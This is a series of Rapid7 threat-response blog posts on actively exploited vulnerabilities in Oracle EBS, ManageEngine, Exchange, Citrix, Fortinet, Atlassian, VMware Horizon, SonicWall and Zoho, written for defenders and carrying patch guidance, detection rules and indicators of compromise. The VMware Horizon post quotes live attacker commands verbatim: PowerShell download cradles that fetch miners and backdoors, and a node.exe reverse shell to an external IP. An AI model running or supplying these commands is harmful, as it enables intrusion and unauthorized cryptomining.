All posts by Glenn Thorpe

CVE-2022-21587: Rapid7 Observed Exploitation of Oracle E-Business Suite Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-21587, a critical arbitrary file upload vulnerability (CVSS v3 score 9.8) impacting Oracle E-Business Suite (EBS). Oracle published a Critical Patch Update Advisory in October 2022 that included a fix; CISA added CVE-2022-21587 to its Known Exploited Vulnerabilities (KEV) catalog on February 2, 2023.

Oracle E-Business Suite is a packaged collection of enterprise applications for a wide variety of tasks such as customer relationship management (CRM), enterprise resource planning (ERP), and human capital management (HCM).

CVE-2022-21587 can lead to unauthenticated remote code execution.

On January 16, 2023, Viettel Security published an analysis of the issue detailing both the vulnerability’s root cause and a method of leveraging the vulnerability to gain code execution. An exploit based on the Viettel Security analysis technique was published on GitHub by “HMs” on February 6, 2023.

Affected products

  • Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through 12.2.11, is vulnerable.

What we’re seeing

The attacker(s) are using the above-mentioned proof-of-concept exploit to upload a Perl script, which fetches (via curl/wget) additional scripts that download a malicious binary payload, making the victim host part of a botnet.

Rapid7 customers

InsightVM & Nexpose customers: Authenticated vulnerability checks for CVE-2022-21587 have been available since November 2022. Note that these require valid Oracle Database credentials to be configured in order to collect the relevant patch level information.

InsightIDR & Managed Detection & Response (MDR) customers: in our current investigations, the previously existing detections have been triggering post exploitation:

  • Suspicious Process - Wget to External IP Address
  • Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port

We’re also testing new rules more specific to Oracle E-Business Suite.

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-47966, a pre-authentication remote code execution (RCE) vulnerability impacting at least 24 on-premises ManageEngine products. CVE-2022-47966 stems from a vulnerable third-party dependency on Apache Santuario. Several of the affected products, including ADSelfService Plus and ServiceDesk Plus, are extremely popular with organizations and attackers alike. Patches were released in October and November of 2022; the exact timing of fixed version releases varies by product.

Organizations using any of the affected products listed in ManageEngine’s advisory should update immediately and review unpatched systems for signs of compromise, as exploit code is publicly available and exploitation has already begun.

Affected products

See ManageEngine’s advisory for CVE-2022-47966 for updated product and version information.

At the time of publication, the vulnerable products are subject to certain caveats according to Zoho’s advisory.

The following list of vulnerable products is subject to the caveats below:
* Vulnerable if SAML-based SSO is configured and currently active.
** Vulnerable if SAML-based SSO was configured at least once in the past, regardless of the current SAML-based SSO status.

  • Access Manager Plus*
  • Active Directory 360**
  • ADAudit Plus**
  • ADManager Plus**
  • ADSelfService Plus**
  • Analytics Plus*
  • Application Control Plus*
  • Asset Explorer**
  • Browser Security Plus*
  • Device Control Plus*
  • Endpoint Central*
  • Endpoint Central MSP*
  • Endpoint DLP*
  • Key Manager Plus*
  • OS Deployer*
  • PAM 360*
  • Password Manager Pro*
  • Patch Manager Plus*
  • Remote Access Plus*
  • Remote Monitoring and Management (RMM)*
  • ServiceDesk Plus**
  • ServiceDesk Plus MSP**
  • SupportCenter Plus**
  • Vulnerability Manager Plus*

Background

ManageEngine released patches for these products in October and November of 2022.

Rapid7 observed exploitation across organizations as early as January 18, 2023.

Security firm Horizon3 released technical information with a proof of concept (PoC) on January 19, 2023.

Rapid7 customers

InsightVM & Nexpose customers: Our researchers are currently evaluating the feasibility of adding vulnerability checks for as many of the affected products as possible. We expect coverage for ManageEngine ServiceDesk Plus to be available in the January 19 content release.

InsightIDR & Managed Detection & Response customers: the previously existing detections have been triggering upon exploitation:

  • Suspicious Process – Zoho ManageEngine Spawns Child
  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink

CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/

Beginning December 20, 2022, Rapid7 has responded to an increase in the number of Microsoft Exchange server compromises. Further investigation aligned these attacks with what CrowdStrike is reporting as “OWASSRF”: a chaining of CVE-2022-41080 and CVE-2022-41082 that bypasses the URL rewrite mitigations Microsoft provided for ProxyNotShell, allowing remote code execution (RCE) through privilege escalation via Outlook Web Access (OWA).

Patched servers do not appear vulnerable; servers relying only on Microsoft’s mitigations do appear vulnerable.

Threat actors are using this to deploy ransomware.

Rapid7 recommends that organizations who have yet to install the Exchange update (KB5019758) from November 2022 should do so immediately and investigate systems for indicators of compromise. Do not rely on the rewrite mitigations for protection.

Affected Products

The following on-prem versions of Exchange that have not applied the November 8, 2022 KB5019758 update are vulnerable:

  • Microsoft Exchange Server 2013
  • Microsoft Exchange Server 2016
  • Microsoft Exchange Server 2019

IOCs

In addition to the detection rules included in InsightIDR for Rapid7 customers, other IOCs include:

  • PowerShell spawned by IIS (‘w3wp.exe’) creating outbound network connections
  • 45.76.141[.]84
  • 45.76.143[.]143

Example command being spawned by IIS (w3wp.exe): (screenshot in the original post)

Decoded command, where the highlighted string (0x2d4c8f8f) is the hex representation of the IP address 45.76.143[.]143: (screenshot in the original post)
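To show the decoding step the caption above describes (the hex literal 0x2d4c8f8f standing in for 45.76.143[.]143) together with the IIS-spawns-PowerShell pattern the rules below key on, here is an added Python example; it is not Rapid7's detection content, and its process-event schema (parent_image, image, command_line) and the sample event are constructed for this illustration.

```python
import base64
import binascii
import ipaddress
import re

# Flags of the form "-<name> <value>" whose value looks like base64.
ARG_RE = re.compile(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})")
# A 32-bit hex literal that may stand in for a dotted-quad address
# (0x2d4c8f8f == 45.76.143.143 in the decoded command from the post).
HEX_IP_RE = re.compile(r"\b0x([0-9a-fA-F]{7,8})\b")


def is_encoded_command_flag(flag):
    """PowerShell accepts -EncodedCommand, -ec and any unambiguous prefix (-e, -enc, ...)."""
    flag = flag.lower()
    return flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag))


def decode_encoded_command(command_line):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    for flag, value in ARG_RE.findall(command_line):
        if not is_encoded_command_flag(flag):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def hex_to_dotted_ip(hex_literal):
    """Convert a 32-bit hex literal such as '0x2d4c8f8f' to dotted-quad form."""
    value = int(hex_literal, 16)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit value: " + hex_literal)
    return str(ipaddress.IPv4Address(value))


def find_hex_ip_literals(script):
    """Return (literal, dotted) pairs for each 32-bit hex literal in a script."""
    return [("0x" + m.group(1), hex_to_dotted_ip("0x" + m.group(1)))
            for m in HEX_IP_RE.finditer(script)]


def analyze_process_event(event):
    """Return findings for one process-creation event.

    `event` uses a constructed schema with 'parent_image', 'image' and
    'command_line' keys; map your Sysmon/EDR field names onto it.
    """
    findings = []
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    command_line = event["command_line"]

    # The IIS worker process spawning PowerShell is the web-shell pattern in the post.
    if parent.endswith("w3wp.exe") and image.endswith("powershell.exe"):
        findings.append("iis_spawns_powershell")

    script = decode_encoded_command(command_line)
    if script is None:
        script = command_line  # nothing encoded; inspect the raw command line
    else:
        findings.append("encoded_command")

    if "system.net.sockets.tcpclient" in script.lower():
        findings.append("tcpclient_in_script")
    for literal, dotted in find_hex_ip_literals(script):
        findings.append("hex_ip_literal %s -> %s" % (literal, dotted))
    return findings


# Constructed sample (not a captured command): the encoded argument hides a
# TcpClient object and the hex-encoded address from the post's screenshot.
SAMPLE_SCRIPT = "$ip = 0x2d4c8f8f; $client = New-Object System.Net.Sockets.TcpClient"
SAMPLE_EVENT = {
    "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"),
}

if __name__ == "__main__":
    for finding in analyze_process_event(SAMPLE_EVENT):
        print(finding)
```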

Rapid7 Customers

Customers already have coverage to assist in assessing exposure to and detecting exploitation of this threat.

InsightVM and Nexpose

InsightVM and Nexpose added checks for CVE-2022-41080 and CVE-2022-41082 on November 8, 2022.

InsightIDR

InsightIDR customers can look for the alerting of the following rules, typically seeing several (or all) triggered on a single executed command:

  • Attacker Technique – PowerShell Registry Cradle
  • Suspicious Process – PowerShell System.Net.Sockets.TcpClient
  • Suspicious Process – Exchange Server Spawns Process
  • PowerShell – Obfuscated Script
  • Webshell – IIS Spawns PowerShell

Additional detections currently being observed with follow-on activity in these compromises include:

  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink
  • Suspicious Process – Started From Users Music Directory

Managed Detection & Response customers

Your customer advisor will reach out to you right away if any suspicious activity is observed in your organization.

Eoin Miller contributed to this article.

CVE-2022-27518: Critical Fix Released for Exploited Citrix ADC, Gateway Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/13/cve-2022-27518-critical-fix-released-for-exploited-citrix-adc-gateway-vulnerability/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On Tuesday, December 13, 2022, Citrix published Citrix ADC and Citrix Gateway Security Bulletin for CVE-2022-27518 announcing fixes for a critical unauthenticated remote code execution (RCE) vulnerability that exists in certain configurations of its Gateway and ADC products. This vulnerability has reportedly been exploited in the wild by state-sponsored threat actors.

In a blog post, Citrix states that no workarounds are available for this vulnerability and that customers running an impacted version (those with a SAML SP or IdP configuration) should update immediately.

Citrix is a high-value target for any capable attacker; earlier today, the National Security Agency (NSA) published Citrix ADC Threat Hunting Guidance warning that Citrix ADC is being targeted by state-sponsored adversaries.

Affected products

The following customer-managed product versions are affected by this vulnerability so long as the ADC or Gateway is configured as a SAML SP or a SAML IdP:

  • Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32
  • Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25
  • Citrix ADC 12.1-FIPS before 12.1-55.291
  • Citrix ADC 12.1-NDcPP before 12.1-55.291

Citrix’s blog post also contains information on how to determine if your configuration is a SAML SP or a SAML IdP.

Mitigation guidance

No workarounds are available; impacted organizations should update to one of the following versions on an emergency basis:

  • Citrix ADC and Citrix Gateway 13.0-58.32 and later releases of 13.0
  • Citrix ADC and Citrix Gateway 12.1-65.25 and later releases of 12.1
  • Citrix ADC 12.1-FIPS 12.1-55.291 and later releases of 12.1-FIPS
  • Citrix ADC 12.1-NDcPP 12.1-55.291 and later releases of 12.1-NDcPP

Rapid7 customers

InsightVM customers will be able to assess their exposure to CVE-2022-27518 with the content release scheduled for December 13, 2022.

CVE-2022-42475: Unauthenticated Remote Code Execution Vulnerability in FortiOS; Exploitation Reported

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/12/cve-2022-42475-unauthenticated-remote-code-execution-vulnerability-in-fortios-exploitation-reported/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Today, December 12, 2022, FortiGuard Labs published advisory FG-IR-22-398 regarding a “heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN [which] may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.”

FortiGuard Labs has confirmed at least one instance of the vulnerability being exploited in the wild and has included in its advisory the current indicators of compromise (IOCs) for FortiOS administrators to use when reviewing the integrity of currently vulnerable systems.

Vulnerabilities of this nature, and on this type of system, have proven to be of high value to attackers. We strongly advise that organizations upgrade to an unaffected version of FortiOS on an emergency basis and follow FortiGuard’s advice to review existing systems for signs of compromise.

Affected products

  • FortiOS version 7.2.0 through 7.2.2
  • FortiOS version 7.0.0 through 7.0.8
  • FortiOS version 6.4.0 through 6.4.10
  • FortiOS version 6.2.0 through 6.2.11
  • FortiOS-6K7K version 7.0.0 through 7.0.7
  • FortiOS-6K7K version 6.4.0 through 6.4.9
  • FortiOS-6K7K version 6.2.0 through 6.2.11
  • FortiOS-6K7K version 6.0.0 through 6.0.14

Solutions

  • Please upgrade to FortiOS version 7.2.3 or above
  • Please upgrade to FortiOS version 7.0.9 or above
  • Please upgrade to FortiOS version 6.4.11 or above
  • Please upgrade to FortiOS version 6.2.12 or above
  • Please upgrade to FortiOS-6K7K version 7.0.8 or above
  • Please upgrade to FortiOS-6K7K version 6.4.10 or above
  • Please upgrade to FortiOS-6K7K version 6.2.12 or above
  • Please upgrade to FortiOS-6K7K version 6.0.15 or above

Rapid7 customers

Vulnerability checks for CVE-2022-42475 are under development and will be available to InsightVM and Nexpose customers in an upcoming content release.

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted HTTP or HTTPS request.

According to communications from Fortinet that were shared on social media, Fortinet “is strongly recommending all customers with vulnerable versions to perform an immediate upgrade.”

Affected products

  • FortiOS 7.0.0 to 7.0.6
  • FortiOS 7.2.0 to 7.2.1
  • FortiProxy 7.0.0 to 7.0.6 and 7.2.0

Remediation

On Thursday, October 6, 2022, Fortinet released version 7.0.7 and version 7.2.2, which resolve the vulnerability.

Along with Fortinet, Rapid7 strongly recommends that organizations running an affected version of the software upgrade to 7.0.7 or 7.2.2 immediately, on an emergency basis. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. While Rapid7 is not currently aware of exploitation in the wild for this vulnerability, using prior FortiOS vulnerabilities (such as CVE-2018-13379) as an indicator, we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.

Furthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.

Rapid7 customers

InsightVM/Nexpose customers: Our researchers are currently working on adding vulnerability check(s).

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/

Exploitation is underway for one of the trio of critical Atlassian vulnerabilities published last week affecting several of the company’s on-premises products. Atlassian has been a focus for attackers: less than two months ago, we observed exploitation of CVE-2022-26134 in Confluence Server and Confluence Data Center.

CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:

  • Confluence Server
  • Confluence Data Center

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Crucible
  • Fisheye
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center

CVE-2022-26138: Hardcoded password in Questions for Confluence app

The most critical of these three is CVE-2022-26138, as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization’s Confluence instance. Unsurprisingly, it didn’t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.

Affected versions

  • Questions for Confluence 2.7.x
    • 2.7.34
    • 2.7.35
  • Questions for Confluence 3.0.x
    • 3.0.2

Mitigation guidance

Organizations using on-prem Confluence should follow Atlassian’s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian’s advisory also includes information on how to look for evidence of exploitation. An FAQ has also been provided.

Please note: Atlassian’s Questions For Confluence Security Advisory 2022-07-20 has a very important call-out that “uninstalling the Questions for Confluence app does not remediate this vulnerability.”

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities

Two other vulnerabilities were announced at the same time, CVE-2022-26136 and CVE-2022-26137, which Atlassian also rates critical. Both are issues with Java Servlet Filters and can be exploited by remote, unauthenticated attackers. Atlassian has already fixed the cloud versions of its products.

The list of affected versions is long and can be found on Atlassian’s Security Advisory.

While the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.

Rapid7 customers

InsightVM and Nexpose: Our engineering team is investigating the feasibility of a vulnerability check to help InsightVM and Nexpose customers assess exposure to CVE-2022-26138.

Active Exploitation of VMware Horizon Servers

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/01/18/active-exploitation-of-vmware-horizon-servers/

This post is co-authored by Charlie Stafford, Lead Security Researcher.

Summary

Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity.

Details

Beginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. The activity our teams are observing is similar to observed threat activity detailed by NHS Digital. Rapid7 services and research teams expect to see a continued strong upward trend in attacker activity directed at VMware Horizon instances vulnerable to Log4Shell exploits.

Rapid7 customers

Rapid7 InsightIDR and MDR customers: Alerts generated by the following detection rules can assist in identifying successful VMware Horizon exploitation:

  • Attacker Technique – PowerShell Download Cradles (created: Thursday, January 3, 2019, 15:31:27 UTC)
  • Suspicious Process – VMWare Horizon Spawns CMD or PowerShell (created: Thursday, January 6, 2022, 14:18:21 UTC)

Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon.

Recommendations

Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.

Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section.

Observed activities

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity.

The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system.

TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:

  • http://72.46.52[.]135/mad_micky.bat
  • http://80.71.158[.]96/xms.ps1
  • http://101.79.1[.]118/2.ps1

The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded):

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile

The System.Net.WebClient download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev (https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Invoke-WebRev.ps1) from http://87.121.52[.]221:443/dd.ps1. Another actor has used it to download a Cobalt Strike backdoor from http://185.112.83[.]116:8080/drv. This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor.

One actor attempts to use System.Net.WebClient to download a rudimentary backdoor from http://0.tcp.ngrok[.]io:18765/qs.exe. If this method fails, the PowerShell BitsTransfer object is used as a backup download method. In this instance, the actor is using ngrok[.]io URLs; ngrok is a tool that allows a user to tunnel traffic through a NAT or firewall. The backdoor communicates with http://2.tcp.ngrok[.]io:19969/index.php and will execute PowerShell commands received from that host.

Example command from this activity:

$a="http://0.tcp.ngrok[.]io:18765/qs.exe";$b="c:\windows\temp\qs.exe";$c = "c:\users\public\qs.exe";Import-Module BitsTransfer;try{(New-Object System.Net.WebClient).DownloadFile($a, $b);Start-Process -FilePath $b;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $b;Start-Process -FilePath $b;exit;}catch{};try{(New-Object System.Net.WebClient).DownloadFile($a, $c);Start-Process -FilePath $c;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $c;Start-Process -FilePath $c;exit;}catch{}

The final method TIDE has observed at Rapid7 customers involves the attacker using the copy of Node included with the VMware server at C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe. Node is used to execute a small snippet of JavaScript code that establishes a reverse shell to 146.59.130.58:

C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(4460, '146.59.130.58', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"
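As an added example (not Rapid7's detection logic), the following Python classifies process-creation events against the patterns described above: the System.Net.WebClient and BitsTransfer download cradles, the node.exe reverse shell, and the miner download URLs. The event schema and the use of the Horizon install directory as the parent-process indicator are assumptions; the command lines are the ones quoted in this post, kept in defanged form.

```python
import re

# Lower-cased fragment of the Horizon install directory from the post's node.exe path;
# using it as the parent-process indicator is an assumption, not a Rapid7 rule.
VMWARE_VIEW_DIR = "\\vmware\\vmware view\\"
SHELLS = ("cmd.exe", "powershell.exe")
URL_RE = re.compile(r"""https?://[^\s'"]+""")
# Miner download URLs the post lists, kept in defanged [.] form.
KNOWN_BAD_URLS = {
    "http://72.46.52[.]135/mad_micky.bat",
    "http://80.71.158[.]96/xms.ps1",
    "http://101.79.1[.]118/2.ps1",
}


def extract_urls(command_line):
    """Return every http(s) URL embedded in a command line."""
    return URL_RE.findall(command_line)


def classify(event):
    """Return the detection tags that fire for one process-creation event."""
    findings = []
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    low = event["command_line"].lower()

    if VMWARE_VIEW_DIR in parent and image.endswith(SHELLS):
        findings.append("horizon_spawns_shell")
    if "system.net.webclient" in low and ("downloadfile" in low or "downloadstring" in low):
        findings.append("webclient_download_cradle")
    if "start-bitstransfer" in low:
        findings.append("bitstransfer_download")
    if image.endswith("node.exe") and "net.socket" in low and "child_process" in low:
        findings.append("node_reverse_shell")
    for url in extract_urls(event["command_line"]):
        tag = "known_bad_url" if url in KNOWN_BAD_URLS else "download_url"
        findings.append("%s %s" % (tag, url))
    return findings


# Constructed events built from the command lines quoted in the post. The parent
# path is a placeholder under the Horizon directory, not a real Horizon process name.
HORIZON_PARENT = r"C:\Program Files\VMware\VMware View\Server\<horizon-service>.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {
        "parent_image": HORIZON_PARENT,
        "image": POWERSHELL,
        "command_line": "powershell.exe -c $wc = New-Object System.Net.WebClient; "
                        "$tempfile = [System.IO.Path]::GetTempFileName(); "
                        "$tempfile += '.bat'; "
                        "$wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); "
                        "& $tempfile",
    },
    {
        "parent_image": HORIZON_PARENT,
        "image": POWERSHELL,
        "command_line": 'powershell.exe -c $a="http://0.tcp.ngrok[.]io:18765/qs.exe";'
                        '$b="c:\\windows\\temp\\qs.exe";Import-Module BitsTransfer;'
                        "try{(New-Object System.Net.WebClient).DownloadFile($a, $b);"
                        "Start-Process -FilePath $b;exit;}catch{};"
                        "try{Start-BitsTransfer -Source $a -Destination $b;"
                        "Start-Process -FilePath $b;exit;}catch{}",
    },
    {
        "parent_image": HORIZON_PARENT,
        "image": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe",
        "command_line": 'node.exe -r net -e "sh = require(\'child_process\').exec(\'cmd.exe\');'
                        "var client = new net.Socket();"
                        "client.connect(4460, '146.59.130.58', function(){"
                        'client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"',
    },
]

if __name__ == "__main__":
    for event in EVENTS:
        print(event["image"].rsplit("\\", 1)[-1], "->", classify(event))
```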

Indicators of compromise (IOC)

The full list of IOCs that TIDE has observed related to this activity is as follows:


Patch Now: Sonicwall Fixes Multiple Vulnerabilities in SMA 100 Devices

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/12/08/patch-now-sonicwall-fixes-multiple-vulnerabilities-in-sma-100-devices/

Summary

On December 7, 2021, Sonicwall released a security advisory that includes patching guidance for five vulnerabilities in SonicWall SMA 100 series devices that were discovered by Rapid7 (including CVE-2021-20038 which is rated CVSSv3 9.8, critical), as well as several other CVEs discovered by NCC Group. While exploitation has not yet started for these vulnerabilities, SonicWall “strongly urges” organizations to apply the appropriate patches.

From Sonicwall’s advisory:

Issue ID | Summary | CVE | CVSS | Reporting Party | Impacted Versions
SMA-3217 | Unauthenticated Stack-Based Buffer Overflow | CVE-2021-20038 | 9.8 | Rapid7 | 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv
SMA-3204 | Authenticated Command Injection | CVE-2021-20039 | 7.2 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3206 | Unauthenticated File Upload Path Traversal | CVE-2021-20040 | 6.5 | Rapid7, NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3207 | Unauthenticated CPU Exhaustion | CVE-2021-20041 | 7.5 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3208 | Unauthenticated Confused Deputy | CVE-2021-20042 | 6.3 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3231 | Heap-Based Buffer Overflow | CVE-2021-20043 | 8.8 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3233 | Post-Authentication Remote Command Execution | CVE-2021-20044 | 7.2 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3235 | Multiple Unauthenticated Heap-Based and Stack-Based Buffer Overflow | CVE-2021-20045 | 9.4 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv

Affected versions

The issues listed above impact SMA 100 series appliances (SMA 200, 210, 400, 410, 500v).

Full disclosure scheduled for January 2022

Rapid7 will release the technical details and proof-of-concept code in January 2022 as part of our coordinated vulnerability disclosure process.

Guidance

As with all critical, network-edge appliances, Rapid7 recommends that vulnerabilities be patched immediately. SonicWall devices have previously been exploited at scale in 2021 and are generally high-value targets for attackers. Sonicwall does not list any workarounds for these issues. For more information, see SonicWall’s advisory.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to all eight of the CVEs in this advisory with vulnerability checks in the December 7, 2021 content release.

Oh No, Zoho: Active Exploitation of CVE-2021-44077 Allowing Unauthenticated Remote Code Execution

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/12/07/oh-no-zoho-active-exploitation-of-cve-2021-44077-allowing-unauthenticated-remote-code-execution/

CVE: CVE-2021-44077
Vendor Advisory: Zoho’s Advisory
AttackerKB: In Progress
IVM Content: Under Evaluation
Patching Urgency: Immediately
Last Update: December 7, 2021 5:00pm ET

Summary

Zoho customers have had a huge incentive lately to keep their software up to date, as recent Zoho critical vulnerabilities have been weaponized shortly after release by advanced attackers. (Rapid7 blogged as recently as November 9, 2021, about the Exploitation of Zoho ManageEngine). This trend continues with CVE-2021-44077, an unauthenticated remote code execution vulnerability affecting several of their products. To assist their customers, Zoho has since set up an online security response plan that includes an exploit detection tool to see if an organization’s installation is compromised.

Affected versions:

  • ManageEngine ServiceDesk Plus, prior to version 11306
  • ServiceDesk Plus MSP, prior to version 10530
  • SupportCenter Plus, prior to version 11014

Details

On September 16, 2021, Zoho released a Security Advisory urging customers to upgrade their software in order to resolve an authentication bypass vulnerability. 67 days later, on November 22, 2021, Zoho released an additional advisory for CVE-2021-44077 indicating that the previously mentioned update also fixed a remote code execution (RCE) vulnerability that is being exploited in the wild.

Last week, CISA released an alert detailing attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). CVE-2021-44077 has also been added to CISA’s known exploited vulnerabilities catalog with a required remediation date of December 15, 2021, for US federal agencies.

Guidance

Rapid7 advises organizations that utilize any of the impacted versions listed above to patch on an emergency basis, use Zoho’s exploit detection tool, and review CISA’s documentation of IOCs to determine whether a specific installation has been compromised. Additionally, we recommend that access to these products be placed behind a VPN and that organizations stay up to date on software versions. Attackers have had enough critical vulnerabilities of late to build a bit of a skillset in understanding how the Zoho software works, so future vulnerabilities will only be exploited even faster.

Rapid7 customers

InsightVM and Nexpose customers: Our researchers are currently evaluating the feasibility of adding a vulnerability check.

Ongoing Exploitation of Windows Installer CVE-2021-41379

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/

On November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address CVE-2021-41379, a “Windows Installer Elevation of Privilege Vulnerability” that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.

